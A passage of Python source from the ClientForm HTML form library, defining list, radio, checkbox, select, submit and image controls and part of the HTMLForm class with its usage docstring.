\"\"\"Return dictionary of HTML attributes for a single ListControl item.\n\n        The HTML element types that describe list items are: OPTION for SELECT\n        controls, INPUT for the rest.  These elements have HTML attributes that\n        you may occasionally want to know about -- for example, the \"alt\" HTML\n        attribute gives a text string describing the item (graphical browsers\n        usually display this as a tooltip).\n\n        The returned dictionary maps HTML attribute names to values.  The names\n        and values are taken from the original HTML.\n\n        \"\"\"\n        deprecation(\n            \"control.get(...).attrs\")\n        return self._get(name, by_label, nr).attrs\n\n    def close_control(self):\n        self._closed = True\n\n    def add_to_form(self, form):\n        assert self._form is None or form == self._form, (\n            \"can't add control to more than one form\")\n        self._form = form\n        if self.name is None:\n            # always count nameless elements as separate controls\n            Control.add_to_form(self, form)\n        else:\n            for ii in xrange(len(form.controls)-1, -1, -1):\n                control = form.controls[ii]\n                if control.name == self.name and control.type == self.type:\n                    if control._closed:\n                        Control.add_to_form(self, form)\n                    else:\n                        control.merge_control(self)\n                    break\n            else:\n                Control.add_to_form(self, form)\n\n    def merge_control(self, control):\n        assert bool(control.multiple) == bool(self.multiple)\n        # usually, isinstance(control, self.__class__)\n        self.items.extend(control.items)\n\n    def fixup(self):\n        \"\"\"\n        ListControls are built up from component list items (which are also\n        ListControls) during parsing.  This method should be called after all\n        items have been added.  See ListControl.__doc__ for the reason this is\n        required.\n\n        \"\"\"\n        # Need to set default selection where no item was indicated as being\n        # selected by the HTML:\n\n        # CHECKBOX:\n        #  Nothing should be selected.\n        # SELECT/single, SELECT/multiple and RADIO:\n        #  RFC 1866 (HTML 2.0): says first item should be selected.\n        #  W3C HTML 4.01 Specification: says that client behaviour is\n        #   undefined in this case.  For RADIO, exactly one must be selected,\n        #   though which one is undefined.\n        #  Both Netscape and Microsoft Internet Explorer (IE) choose first\n        #   item for SELECT/single.  However, both IE5 and Mozilla (both 1.0\n        #   and Firebird 0.6) leave all items unselected for RADIO and\n        #   SELECT/multiple.\n\n        # Since both Netscape and IE all choose the first item for\n        # SELECT/single, we do the same.  OTOH, both Netscape and IE\n        # leave SELECT/multiple with nothing selected, in violation of RFC 1866\n        # (but not in violation of the W3C HTML 4 standard); the same is true\n        # of RADIO (which *is* in violation of the HTML 4 standard).  We follow\n        # RFC 1866 if the _select_default attribute is set, and Netscape and IE\n        # otherwise.  RFC 1866 and HTML 4 are always violated insofar as you\n        # can deselect all items in a RadioControl.\n\n        for o in self.items: \n            # set items' controls to self, now that we've merged\n            o.__dict__[\"_control\"] = self\n\n    def __getattr__(self, name):\n        if name == \"value\":\n            compat = self._form.backwards_compat\n            if self.name is None:\n                return []\n            return [o.name for o in self.items if o.selected and\n                    (not o.disabled or compat)]\n        else:\n            raise AttributeError(\"%s instance has no attribute '%s'\" %\n                                 (self.__class__.__name__, name))\n\n    def __setattr__(self, name, value):\n        if name == \"value\":\n            if self.disabled:\n                raise AttributeError(\"control '%s' is disabled\" % self.name)\n            if self.readonly:\n                raise AttributeError(\"control '%s' is readonly\" % self.name)\n            self._set_value(value)\n        elif name in (\"name\", \"type\", \"multiple\"):\n            raise AttributeError(\"%s attribute is readonly\" % name)\n        else:\n            self.__dict__[name] = value\n\n    def _set_value(self, value):\n        if value is None or isstringlike(value):\n            raise TypeError(\"ListControl, must set a sequence\")\n        if not value:\n            compat = self._form.backwards_compat\n            for o in self.items:\n                if not o.disabled or compat:\n                    o.selected = False\n        elif self.multiple:\n            self._multiple_set_value(value)\n        elif len(value) > 1:\n            raise ItemCountError(\n                \"single selection list, must set sequence of \"\n                \"length 0 or 1\")\n        else:\n            self._single_set_value(value)\n\n    def _get_items(self, name, target=1):\n        all_items = self.get_items(name)\n        items = [o for o in all_items if not o.disabled]\n        if len(items) < target:\n            if len(all_items) < target:\n                raise ItemNotFoundError(\n                    \"insufficient items with name %r\" % name)\n            else:\n                raise AttributeError(\n                    \"insufficient non-disabled items with name %s\" % name)\n        on = []\n        off = []\n        for o in items:\n            if o.selected:\n                on.append(o)\n            else:\n                off.append(o)\n        return on, off\n\n    def _single_set_value(self, value):\n        assert len(value) == 1\n        on, off = self._get_items(value[0])\n        assert len(on) <= 1\n        if not on:\n            off[0].selected = True\n\n    def _multiple_set_value(self, value):\n        compat = self._form.backwards_compat\n        turn_on = []  # transactional-ish\n        turn_off = [item for item in self.items if\n                    item.selected and (not item.disabled or compat)]\n        names = {}\n        for nn in value:\n            if nn in names.keys():\n                names[nn] += 1\n            else:\n                names[nn] = 1\n        for name, count in names.items():\n            on, off = self._get_items(name, count)\n            for i in xrange(count):\n                if on:\n                    item = on[0]\n                    del on[0]\n                    del turn_off[turn_off.index(item)]\n                else:\n                    item = off[0]\n                    del off[0]\n                    turn_on.append(item)\n        for item in turn_off:\n            item.selected = False\n        for item in turn_on:\n            item.selected = True\n\n    def set_value_by_label(self, value):\n        \"\"\"Set the value of control by item labels.\n\n        value is expected to be an iterable of strings that are substrings of\n        the item labels that should be selected.  Before substring matching is\n        performed, the original label text is whitespace-compressed\n        (consecutive whitespace characters are converted to a single space\n        character) and leading and trailing whitespace is stripped.  Ambiguous\n        labels are accepted without complaint if the form's backwards_compat is\n        True; otherwise, it will not complain as long as all ambiguous labels\n        share the same item name (e.g. OPTION value).\n\n        \"\"\"\n        if isstringlike(value):\n            raise TypeError(value)\n        if not self.multiple and len(value) > 1:\n            raise ItemCountError(\n                \"single selection list, must set sequence of \"\n                \"length 0 or 1\")\n        items = []\n        for nn in value:\n            found = self.get_items(label=nn)\n            if len(found) > 1:\n                if not self._form.backwards_compat:\n                    # ambiguous labels are fine as long as item names (e.g.\n                    # OPTION values) are same\n                    opt_name = found[0].name\n                    if [o for o in found[1:] if o.name != opt_name]:\n                        raise AmbiguityError(nn)\n                else:\n                    # OK, we'll guess :-(  Assume first available item.\n                    found = found[:1]\n            for o in found:\n                # For the multiple-item case, we could try to be smarter,\n                # saving them up and trying to resolve, but that's too much.\n                if self._form.backwards_compat or o not in items:\n                    items.append(o)\n                    break\n            else:  # all of them are used\n                raise ItemNotFoundError(nn)\n        # now we have all the items that should be on\n        # let's just turn everything off and then back on.\n        self.value = []\n        for o in items:\n            o.selected = True\n\n    def get_value_by_label(self):\n        \"\"\"Return the value of the control as given by normalized labels.\"\"\"\n        res = []\n        compat = self._form.backwards_compat\n        for o in self.items:\n            if (not o.disabled or compat) and o.selected:\n                for l in o.get_labels():\n                    if l.text:\n                        res.append(l.text)\n                        break\n                else:\n                    res.append(None)\n        return res\n\n    def possible_items(self, by_label=False):\n        \"\"\"Deprecated: return the names or labels of all possible items.\n\n        Includes disabled items, which may be misleading for some use cases.\n\n        \"\"\"\n        deprecation(\n            \"[item.name for item in self.items]\")\n        if by_label:\n            res = []\n            for o in self.items:\n                for l in o.get_labels():\n                    if l.text:\n                        res.append(l.text)\n                        break\n                else:\n                    res.append(None)\n            return res\n        return [o.name for o in self.items]\n\n    def _totally_ordered_pairs(self):\n        if self.disabled or self.name is None:\n            return []\n        else:\n            return [(o._index, self.name, o.name) for o in self.items\n                    if o.selected and not o.disabled]\n\n    def __str__(self):\n        name = self.name\n        if name is None: name = \"<None>\"\n\n        display = [str(o) for o in self.items]\n\n        infos = []\n        if self.disabled: infos.append(\"disabled\")\n        if self.readonly: infos.append(\"readonly\")\n        info = \", \".join(infos)\n        if info: info = \" (%s)\" % info\n\n        return \"<%s(%s=[%s])%s>\" % (self.__class__.__name__,\n                                    name, \", \".join(display), info)\n\n\nclass RadioControl(ListControl):\n    \"\"\"\n    Covers:\n\n    INPUT/RADIO\n\n    \"\"\"\n    def __init__(self, type, name, attrs, select_default=False, index=None):\n        attrs.setdefault(\"value\", \"on\")\n        ListControl.__init__(self, type, name, attrs, select_default,\n                             called_as_base_class=True, index=index)\n        self.__dict__[\"multiple\"] = False\n        o = Item(self, attrs, index)\n        o.__dict__[\"_selected\"] = \"checked\" in attrs\n\n    def fixup(self):\n        ListControl.fixup(self)\n        found = [o for o in self.items if o.selected and not o.disabled]\n        if not found:\n            if self._select_default:\n                for o in self.items:\n                    if not o.disabled:\n                        o.selected = True\n                        break\n        else:\n            # Ensure only one item selected.  Choose the last one,\n            # following IE and Firefox.\n            for o in found[:-1]:\n                o.selected = False\n\n    def get_labels(self):\n        return []\n\nclass CheckboxControl(ListControl):\n    \"\"\"\n    Covers:\n\n    INPUT/CHECKBOX\n\n    \"\"\"\n    def __init__(self, type, name, attrs, select_default=False, index=None):\n        attrs.setdefault(\"value\", \"on\")\n        ListControl.__init__(self, type, name, attrs, select_default,\n                             called_as_base_class=True, index=index)\n        self.__dict__[\"multiple\"] = True\n        o = Item(self, attrs, index)\n        o.__dict__[\"_selected\"] = \"checked\" in attrs\n\n    def get_labels(self):\n        return []\n\n\nclass SelectControl(ListControl):\n    \"\"\"\n    Covers:\n\n    SELECT (and OPTION)\n\n\n    OPTION 'values', in HTML parlance, are Item 'names' in ClientForm parlance.\n\n    SELECT control values and labels are subject to some messy defaulting\n    rules.  For example, if the HTML representation of the control is:\n\n    <SELECT name=year>\n      <OPTION value=0 label=\"2002\">current year</OPTION>\n      <OPTION value=1>2001</OPTION>\n      <OPTION>2000</OPTION>\n    </SELECT>\n\n    The items, in order, have labels \"2002\", \"2001\" and \"2000\", whereas their\n    names (the OPTION values) are \"0\", \"1\" and \"2000\" respectively.  Note that\n    the value of the last OPTION in this example defaults to its contents, as\n    specified by RFC 1866, as do the labels of the second and third OPTIONs.\n\n    The OPTION labels are sometimes more meaningful than the OPTION values,\n    which can make for more maintainable code.\n\n    Additional read-only public attribute: attrs\n\n    The attrs attribute is a dictionary of the original HTML attributes of the\n    SELECT element.  Other ListControls do not have this attribute, because in\n    other cases the control as a whole does not correspond to any single HTML\n    element.  control.get(...).attrs may be used as usual to get at the HTML\n    attributes of the HTML elements corresponding to individual list items (for\n    SELECT controls, these are OPTION elements).\n\n    Another special case is that the Item.attrs dictionaries have a special key\n    \"contents\" which does not correspond to any real HTML attribute, but rather\n    contains the contents of the OPTION element:\n\n    <OPTION>this bit</OPTION>\n\n    \"\"\"\n    # HTML attributes here are treated slightly differently from other list\n    # controls:\n    # -The SELECT HTML attributes dictionary is stuffed into the OPTION\n    #  HTML attributes dictionary under the \"__select\" key.\n    # -The content of each OPTION element is stored under the special\n    #  \"contents\" key of the dictionary.\n    # After all this, the dictionary is passed to the SelectControl constructor\n    # as the attrs argument, as usual.  However:\n    # -The first SelectControl constructed when building up a SELECT control\n    #  has a constructor attrs argument containing only the __select key -- so\n    #  this SelectControl represents an empty SELECT control.\n    # -Subsequent SelectControls have both OPTION HTML-attribute in attrs and\n    #  the __select dictionary containing the SELECT HTML-attributes.\n\n    def __init__(self, type, name, attrs, select_default=False, index=None):\n        # fish out the SELECT HTML attributes from the OPTION HTML attributes\n        # dictionary\n        self.attrs = attrs[\"__select\"].copy()\n        self.__dict__[\"_label\"] = _get_label(self.attrs)\n        self.__dict__[\"id\"] = self.attrs.get(\"id\")\n        self.__dict__[\"multiple\"] = \"multiple\" in self.attrs\n        # the majority of the contents, label, and value dance already happened\n        contents = attrs.get(\"contents\")\n        attrs = attrs.copy()\n        del attrs[\"__select\"]\n\n        ListControl.__init__(self, type, name, self.attrs, select_default,\n                             called_as_base_class=True, index=index)\n        self.disabled = \"disabled\" in self.attrs\n        self.readonly = \"readonly\" in self.attrs\n        if \"value\" in attrs:\n            # otherwise it is a marker 'select started' token\n            o = Item(self, attrs, index)\n            o.__dict__[\"_selected\"] = \"selected\" in attrs\n            # add 'label' label and contents label, if different.  If both are\n            # provided, the 'label' label is used for display in HTML \n            # 4.0-compliant browsers (and any lower spec? not sure) while the\n            # contents are used for display in older or less-compliant\n            # browsers.  We make label objects for both, if the values are\n            # different.\n            label = attrs.get(\"label\")\n            if label:\n                o._labels.append(Label({\"__text\": label}))\n                if contents and contents != label:\n                    o._labels.append(Label({\"__text\": contents}))\n            elif contents:\n                o._labels.append(Label({\"__text\": contents}))\n\n    def fixup(self):\n        ListControl.fixup(self)\n        # Firefox doesn't exclude disabled items from those considered here\n        # (i.e. from 'found', for both branches of the if below).  Note that\n        # IE6 doesn't support the disabled attribute on OPTIONs at all.\n        found = [o for o in self.items if o.selected]\n        if not found:\n            if not self.multiple or self._select_default:\n                for o in self.items:\n                    if not o.disabled:\n                        was_disabled = self.disabled\n                        self.disabled = False\n                        try:\n                            o.selected = True\n                        finally:\n                            o.disabled = was_disabled\n                        break\n        elif not self.multiple:\n            # Ensure only one item selected.  Choose the last one,\n            # following IE and Firefox.\n            for o in found[:-1]:\n                o.selected = False\n\n\n#---------------------------------------------------\nclass SubmitControl(ScalarControl):\n    \"\"\"\n    Covers:\n\n    INPUT/SUBMIT\n    BUTTON/SUBMIT\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        ScalarControl.__init__(self, type, name, attrs, index)\n        # IE5 defaults SUBMIT value to \"Submit Query\"; Firebird 0.6 leaves it\n        # blank, Konqueror 3.1 defaults to \"Submit\".  HTML spec. doesn't seem\n        # to define this.\n        if self.value is None and not self.disabled and not self.readonly: self.value = \"\"\n        self.readonly = True\n\n    def get_labels(self):\n        res = []\n        if self.value:\n            res.append(Label({\"__text\": self.value}))\n        res.extend(ScalarControl.get_labels(self))\n        return res\n\n    def is_of_kind(self, kind): return kind == \"clickable\"\n\n    def _click(self, form, coord, return_type, request_class=_urllib.request.Request):\n        self._clicked = coord\n        r = form._switch_click(return_type, request_class)\n        self._clicked = False\n        return r\n\n    def _totally_ordered_pairs(self):\n        if not self._clicked:\n            return []\n        return ScalarControl._totally_ordered_pairs(self)\n\n\n#---------------------------------------------------\nclass ImageControl(SubmitControl):\n    \"\"\"\n    Covers:\n\n    INPUT/IMAGE\n\n    Coordinates are specified using one of the HTMLForm.click* methods.\n\n    \"\"\"\n    def __init__(self, type, name, attrs, index=None):\n        SubmitControl.__init__(self, type, name, attrs, index)\n        self.readonly = False\n\n    def _totally_ordered_pairs(self):\n        clicked = self._clicked\n        if self.disabled or not clicked:\n            return []\n        name = self.name\n        if name is None: return []\n        pairs = [\n            (self._index, \"%s.x\" % name, str(clicked[0])),\n            (self._index+1, \"%s.y\" % name, str(clicked[1])),\n            ]\n        value = self._value\n        if value:\n            pairs.append((self._index+2, name, value))\n        return pairs\n\n    get_labels = ScalarControl.get_labels\n\n# aliases, just to make str(control) and str(form) clearer\nclass PasswordControl(TextControl): pass\nclass HiddenControl(TextControl): pass\nclass TextareaControl(TextControl): pass\nclass SubmitButtonControl(SubmitControl): pass\n\n\ndef is_listcontrol(control): return control.is_of_kind(\"list\")\n\n\nclass HTMLForm:\n    \"\"\"Represents a single HTML <form> ... </form> element.\n\n    A form consists of a sequence of controls that usually have names, and\n    which can take on various values.  The values of the various types of\n    controls represent variously: text, zero-or-one-of-many or many-of-many\n    choices, and files to be uploaded.  Some controls can be clicked on to\n    submit the form, and clickable controls' values sometimes include the\n    coordinates of the click.\n\n    Forms can be filled in with data to be returned to the server, and then\n    submitted, using the click method to generate a request object suitable for\n    passing to urllib2.urlopen (or the click_request_data or click_pairs\n    methods if you're not using urllib2).\n\n    import ClientForm\n    forms = ClientForm.ParseFile(html, base_uri)\n    form = forms[0]\n\n    form[\"query\"] = \"Python\"\n    form.find_control(\"nr_results\").get(\"lots\").selected = True\n\n    response = urllib2.urlopen(form.click())\n\n    Usually, HTMLForm instances are not created directly.  Instead, the\n    ParseFile or ParseResponse factory functions are used.  If you do construct\n    HTMLForm objects yourself, however, note that an HTMLForm instance is only\n    properly initialised after the fixup method has been called (ParseFile and\n    ParseResponse do this for you).  See ListControl.__doc__ for the reason\n    this is required.\n\n    Indexing a form (form[\"control_name\"]) returns the named Control's value\n    attribute.  Assignment to a form index (form[\"control_name\"] = something)\n    is equivalent to assignment to the named Control's value attribute.  If you\n    need to be more specific than just supplying the control's name, use the\n    set_value and get_value methods.\n\n    ListControl values are lists of item names (specifically, the names of the\n    items that are selected and not disabled, and hence are \"successful\" -- ie.\n    cause data to be returned to the server).  The list item's name is the\n    value of the corresponding HTML element's\"value\" attribute.\n\n    Example:\n\n      <INPUT type=\"CHECKBOX\" name=\"cheeses\" value=\"leicester\"></INPUT>\n      <INPUT type=\"CHECKBOX\" name=\"cheeses\" value=\"cheddar\"></INPUT>\n\n    defines a CHECKBOX control with name \"cheeses\" which has two items, named\n    \"leicester\" and \"cheddar\".\n\n    Another example:\n\n      <SELECT name=\"more_cheeses\">\n        <OPTION>1</OPTION>\n        <OPTION value=\"2\" label=\"CHEDDAR\">cheddar</OPTION>\n      </SELECT>\n\n    defines a SELECT control with name \"more_cheeses\" which has two items,\n    named \"1\" and \"2\" (because the OPTION element's value HTML attribute\n    defaults to the element contents -- see SelectControl.__doc__ for more on\n    these defaulting rules).\n\n    To select, deselect or otherwise manipulate individual list items, use the\n    HTMLForm.find_control() and ListControl.get() methods.  To set the whole\n    value, do as for any other control: use indexing or the set_/get_value\n    methods.\n\n    Example:\n\n    # select *only* the item named \"cheddar\"\n    form[\"cheeses\"] = [\"cheddar\"]\n    # select \"cheddar\", leave other items unaffected\n    form.find_control(\"cheeses\").get(\"cheddar\").selected = True\n\n    Some controls (RADIO and SELECT without the multiple attribute) can only\n    have zero or one items selected at a time.  Some controls (CHECKBOX and\n    SELECT with the multiple attribute) can have multiple items selected at a\n    time.  To set the whole value of a ListControl, assign a sequence to a form\n    index:\n\n    form[\"cheeses\"] = [\"cheddar\", \"leicester\"]\n\n    If the ListControl is not multiple-selection, the assigned list must be of\n    length one.\n\n    To check if a control has an item, if an item is selected, or if an item is\n    successful (selected and not disabled), respectively:\n\n    \"cheddar\" in [item.name for item in form.find_control(\"cheeses\").items]\n    \"cheddar\" in [item.name for item in form.find_control(\"cheeses\").items and\n                  item.selected]\n    \"cheddar\" in form[\"cheeses\"]  # (or \"cheddar\" in form.get_value(\"cheeses\"))\n\n    Note that some list items may be disabled (see below).\n\n    Note the following mistake:\n\n    form[control_name] = control_value\n    assert form[control_name] == control_value  # not necessarily true\n\n    The reason for this is that form[control_name] always gives the list items\n    in the order they were listed in the HTML.\n\n    List items (hence list values, too) can be referred to in terms of list\n    item labels rather than list item names using the appropriate label\n    arguments.  Note that each item may have several labels.\n\n    The question of default values of OPTION contents, labels and values is\n    somewhat complicated: see SelectControl.__doc__ and\n    ListControl.get_item_attrs.__doc__ if you think you need to know.\n\n    Controls can be disabled or readonly.  In either case, the control's value\n    cannot be changed until you clear those flags (see example below).\n    Disabled is the state typically represented by browsers by 'greying out' a\n    control.  Disabled controls are not 'successful' -- they don't cause data\n    to get returned to the server.  Readonly controls usually appear in\n    browsers as read-only text boxes.  Readonly controls are successful.  List\n    items can also be disabled.  Attempts to select or deselect disabled items\n    fail with AttributeError.\n\n    If a lot of controls are readonly, it can be useful to do this:\n\n    form.set_all_readonly(False)\n\n    To clear a control's value attribute, so that it is not successful (until a\n    value is subsequently set):\n\n    form.clear(\"cheeses\")\n\n    More examples:\n\n    control = form.find_control(\"cheeses\")\n    control.disabled = False\n    control.readonly = False\n    control.get(\"gruyere\").disabled = True\n    control.items[0].selected = True\n\n    See the various Control classes for further documentation.  Many methods\n    take name, type, kind, id, label and nr arguments to specify the control to\n    be operated on: see HTMLForm.find_control.__doc__.\n\n    ControlNotFoundError (subclass of ValueError) is raised if the specified\n    control can't be found.  This includes occasions where a non-ListControl\n    is found, but the method (set, for example) requires a ListControl.\n    ItemNotFoundError (subclass of ValueError) is raised if a list item can't\n    be found.  ItemCountError (subclass of ValueError) is raised if an attempt\n    is made to select more than one item and the control doesn't allow that, or\n    set/get_single are called and the control contains more than one item.\n    AttributeError is raised if a control or item is readonly or disabled and\n    an attempt is made to alter its value.\n\n    Security note: Remember that any passwords you store in HTMLForm instances\n    will be saved to disk in the clear if you pickle them (directly or\n    indirectly).  The simplest solution to this is to avoid pickling HTMLForm\n    objects.  You could also pickle before filling in any password, or just set\n    the password to \"\" before pickling.\n\n\n    Public attributes:\n\n    action: full (absolute URI) form action\n    method: \"GET\" or \"POST\"\n    enctype: form transfer encoding MIME type\n    name: name of form (None if no name was specified)\n    attrs: dictionary mapping original HTML form attributes to their values\n\n    controls: list of Control instances; do not alter this list\n     (instead, call form.new_control to make a Control and add it to the\n     form, or control.add_to_form if you already have a Control instance)\n\n\n\n    Methods for form filling:\n    -------------------------\n\n    Most of the these methods have very similar arguments.  See\n    HTMLForm.find_control.__doc__ for details of the name, type, kind, label\n    and nr arguments.\n\n    def find_control(self,\n                     name=None, type=None, kind=None, id=None, predicate=None,\n                     nr=None, label=None)\n\n    get_value(name=None, type=None, kind=None, id=None, nr=None,\n              by_label=False,  # by_label is deprecated\n              label=None)\n    set_value(value,\n              name=None, type=None, kind=None, id=None, nr=None,\n              by_label=False,  # by_label is deprecated\n              label=None)\n\n    clear_all()\n    clear(name=None, type=None, kind=None, id=None, nr=None, label=None)\n\n    set_all_readonly(readonly)\n\n\n    Method applying only to FileControls:\n\n    add_file(file_object,\n             content_type=\"application/octet-stream\", filename=None,\n             name=None, id=None, nr=None, label=None)\n\n\n    Methods applying only to clickable controls:\n\n    click(name=None, type=None, id=None, nr=0, coord=(1,1), label=None)\n    click_request_data(name=None, type=None, id=None, nr=0, coord=(1,1),\n                       label=None)\n    click_pairs(name=None, type=None, id=None, nr=0, coord=(1,1), label=None)\n\n    \"\"\"\n\n    type2class = {\n        \"text\": TextControl,\n        \"password\": PasswordControl,\n        \"hidden\": HiddenControl,\n        \"textarea\": TextareaControl,\n\n        \"isindex\": IsindexControl,\n\n        \"file\": FileControl,\n\n        \"button\": IgnoreControl,\n        \"buttonbutton\": IgnoreControl,\n        \"reset\": IgnoreControl,\n        \"resetbutton\": IgnoreControl,\n\n        \"submit\": SubmitControl,\n        \"submitbutton\": SubmitButtonControl,\n        \"image\": ImageControl,\n\n        \"radio\": RadioControl,\n        \"checkbox\": CheckboxControl,\n        \"select\": SelectControl,\n        }\n\n#---------------------------------------------------\n# Initialisation.  Use ParseResponse / ParseFile instead.\n\n    def __init__(self, action, method=\"GET\",\n                 enctype=None,\n                 name=None, attrs=None,\n                 request_class=_urllib.request.Request,\n                 forms=None, labels=None, id_to_labels=None,\n                 backwards_compat=True):\n        \"\"\"\n        In the usual case, use ParseResponse (or ParseFile) to create new\n        HTMLForm objects.\n\n        action: full (absolute URI) form action\n        method: \"GET\" or \"POST\"\n        enctype: form transfer encoding MIME type\n        name: name of form\n        attrs: dictionary mapping original HTML form attributes to their values\n\n        \"\"\"\n        self.action = action\n        self.method = method\n        self.enctype = enctype or \"application/x-www-form-urlencoded\"\n        self.name = name\n        if attrs is not None:\n            self.attrs = attrs.copy()\n        else:\n            self.attrs = {}\n        self.controls = []\n        self._request_class = request_class\n\n        # these attributes are used by zope.testbrowser\n        self._forms = forms  # this is a semi-public API!\n        self._labels = labels  # this is a semi-public API!\n        self._id_to_labels = id_to_labels  # this is a semi-public API!\n\n        self.backwards_compat = backwards_compat  # note __setattr__\n\n        self._urlunparse = _urllib.parse.urlunparse\n        self._urlparse = _urllib.parse.urlparse\n\n    def __getattr__(self, name):\n        if name == \"backwards_compat\":\n            return self._backwards_compat\n        return getattr(HTMLForm, name)\n\n    def __setattr__(self, name, value):\n        # yuck\n        if name == \"backwards_compat\":\n            name = \"_backwards_compat\"\n            value = bool(value)\n            for cc in self.controls:\n                try:\n                    items = cc.items \n                except AttributeError:\n                    continue\n                else:\n                    for ii in items:\n                        for ll in ii.get_labels():\n                            ll._backwards_compat = value\n        self.__dict__[name] = value\n\n    def new_control(self, type, name, attrs,\n                    ignore_unknown=False, select_default=False, index=None):\n        \"\"\"Adds a new control to the form.\n\n        This is usually called by ParseFile and ParseResponse.  Don't call it\n        youself unless you're building your own Control instances.\n\n        Note that controls representing lists of items are built up from\n        controls holding only a single list item.  See ListControl.__doc__ for\n        further information.\n\n        type: type of control (see Control.__doc__ for a list)\n        attrs: HTML attributes of control\n        ignore_unknown: if true, use a dummy Control instance for controls of\n         unknown type; otherwise, use a TextControl\n        select_default: for RADIO and multiple-selection SELECT controls, pick\n         the first item as the default if no 'selected' HTML attribute is\n         present (this defaulting happens when the HTMLForm.fixup method is\n         called)\n        index: index of corresponding element in HTML (see\n         MoreFormTests.test_interspersed_controls for motivation)\n\n        \"\"\"\n        type = type.lower()\n        klass = self.type2class.get(type)\n        if klass is None:\n            if ignore_unknown:\n                klass = IgnoreControl\n            else:\n                klass = TextControl\n\n        a = attrs.copy()\n        if issubclass(klass, ListControl):\n            control = klass(type, name, a, select_default, index)\n        else:\n            control = klass(type, name, a, index)\n\n        if type == \"select\" and len(attrs) == 1:\n            for ii in xrange(len(self.controls)-1, -1, -1):\n                ctl = self.controls[ii]\n                if ctl.type == \"select\":\n                    ctl.close_control()\n                    break\n\n        control.add_to_form(self)\n        control._urlparse = self._urlparse\n        control._urlunparse = self._urlunparse\n\n    def fixup(self):\n        \"\"\"Normalise form after all controls have been added.\n\n        This is usually called by ParseFile and ParseResponse.  Don't call it\n        youself unless you're building your own Control instances.\n\n        This method should only be called once, after all controls have been\n        added to the form.\n\n        \"\"\"\n        for control in self.controls:\n            control.fixup()\n        self.backwards_compat = self._backwards_compat\n\n#---------------------------------------------------\n    def __str__(self):\n        header = \"%s%s %s %s\" % (\n            (self.name and self.name+\" \" or \"\"),\n            self.method, self.action, self.enctype)\n        rep = [header]\n        for control in self.controls:\n            rep.append(\"  %s\" % str(control))\n        return \"<%s>\" % \"\\n\".join(rep)\n\n#---------------------------------------------------\n# Form-filling methods.\n\n    def __getitem__(self, name):\n        return self.find_control(name).value\n    def __contains__(self, name):\n        return bool(self.find_control(name))\n    def __setitem__(self, name, value):\n        control = self.find_control(name)\n        try:\n            control.value = value\n        except AttributeError as e:\n            raise ValueError(str(e))\n\n    def get_value(self,\n                  name=None, type=None, kind=None, id=None, nr=None,\n                  by_label=False,  # by_label is deprecated\n                  label=None):\n        \"\"\"Return value of control.\n\n        If only name and value arguments are supplied, equivalent to\n\n        form[name]\n\n        \"\"\"\n        if by_label:\n            deprecation(\"form.get_value_by_label(...)\")\n        c = self.find_control(name, type, kind, id, label=label, nr=nr)\n        if by_label:\n            try:\n                meth = c.get_value_by_label\n            except AttributeError:\n                raise NotImplementedError(\n                    \"control '%s' does not yet support by_label\" % c.name)\n            else:\n                return meth()\n        else:\n            return c.value\n    def set_value(self, value,\n                  name=None, type=None, kind=None, id=None, nr=None,\n                  by_label=False,  # by_label is deprecated\n                  label=None):\n        \"\"\"Set value of control.\n\n        If only name and value arguments are supplied, equivalent to\n\n        form[name] = value\n\n        \"\"\"\n        if by_label:\n            deprecation(\"form.get_value_by_label(...)\")\n        c = self.find_control(name, type, kind, id, label=label, nr=nr)\n        if by_label:\n            try:\n                meth = c.set_value_by_label\n            except AttributeError:\n                raise NotImplementedError(\n                    \"control '%s' does not yet support by_label\" % c.name)\n            else:\n                meth(value)\n        else:\n            c.value = value\n    def get_value_by_label(\n        self, name=None, type=None, kind=None, id=None, label=None, nr=None):\n        \"\"\"\n\n        All arguments should be passed by name.\n\n        \"\"\"\n        c = self.find_control(name, type, kind, id, label=label, nr=nr)\n        return c.get_value_by_label()\n\n    def set_value_by_label(\n        self, value,\n        name=None, type=None, kind=None, id=None, label=None, nr=None):\n        \"\"\"\n\n        All arguments should be passed by name.\n\n        \"\"\"\n        c = self.find_control(name, type, kind, id, label=label, nr=nr)\n        c.set_value_by_label(value)\n\n    def set_all_readonly(self, readonly):\n        for control in self.controls:\n            control.readonly = bool(readonly)\n\n    def clear_all(self):\n        \"\"\"Clear the value attributes of all controls in the form.\n\n        See HTMLForm.clear.__doc__.\n\n        \"\"\"\n        for control in self.controls:\n            control.clear()\n\n    def clear(self,\n              name=None, type=None, kind=None, id=None, nr=None, label=None):\n        \"\"\"Clear the value attribute of a control.\n\n        As a result, the affected control will not be successful until a value\n        is subsequently set.  AttributeError is raised on readonly controls.\n\n        \"\"\"\n        c = self.find_control(name, type, kind, id, label=label, nr=nr)\n        c.clear()\n\n\n#---------------------------------------------------\n# Form-filling methods applying only to ListControls.\n\n    def possible_items(self,  # deprecated\n                       name=None, type=None, kind=None, id=None,\n                       nr=None, by_label=False, label=None):\n        \"\"\"Return a list of all values that the specified control can take.\"\"\"\n        c = self._find_list_control(name, type, kind, id, label, nr)\n        return c.possible_items(by_label)\n\n    def set(self, selected, item_name,  # deprecated\n            name=None, type=None, kind=None, id=None, nr=None,\n            by_label=False, label=None):\n        \"\"\"Select / deselect named list item.\n\n        selected: boolean selected state\n\n        \"\"\"\n        self._find_list_control(name, type, kind, id, label, nr).set(\n            selected, item_name, by_label)\n    def toggle(self, item_name,  # deprecated\n               name=None, type=None, kind=None, id=None, nr=None,\n               by_label=False, label=None):\n        \"\"\"Toggle selected state of named list item.\"\"\"\n        self._find_list_control(name, type, kind, id, label, nr).toggle(\n            item_name, by_label)\n\n    def set_single(self, selected,  # deprecated\n                   name=None, type=None, kind=None, id=None,\n                   nr=None, by_label=None, label=None):\n        \"\"\"Select / deselect list item in a control having only one item.\n\n        If the control has multiple list items, ItemCountError is raised.\n\n        This is just a convenience method, so you don't need to know the item's\n        name -- the item name in these single-item controls is usually\n        something meaningless like \"1\" or \"on\".\n\n        For example, if a checkbox has a single item named \"on\", the following\n        two calls are equivalent:\n\n        control.toggle(\"on\")\n        control.toggle_single()\n\n        \"\"\"  # by_label ignored and deprecated\n        self._find_list_control(\n            name, type, kind, id, label, nr).set_single(selected)\n    def toggle_single(self, name=None, type=None, kind=None, id=None,\n                      nr=None, by_label=None, label=None):  # deprecated\n        \"\"\"Toggle selected state of list item in control having only one item.\n\n        The rest is as for HTMLForm.set_single.__doc__.\n\n        \"\"\"  # by_label ignored and deprecated\n        self._find_list_control(name, type, kind, id, label, nr).toggle_single()\n\n#---------------------------------------------------\n# Form-filling method applying only to FileControls.\n\n    def 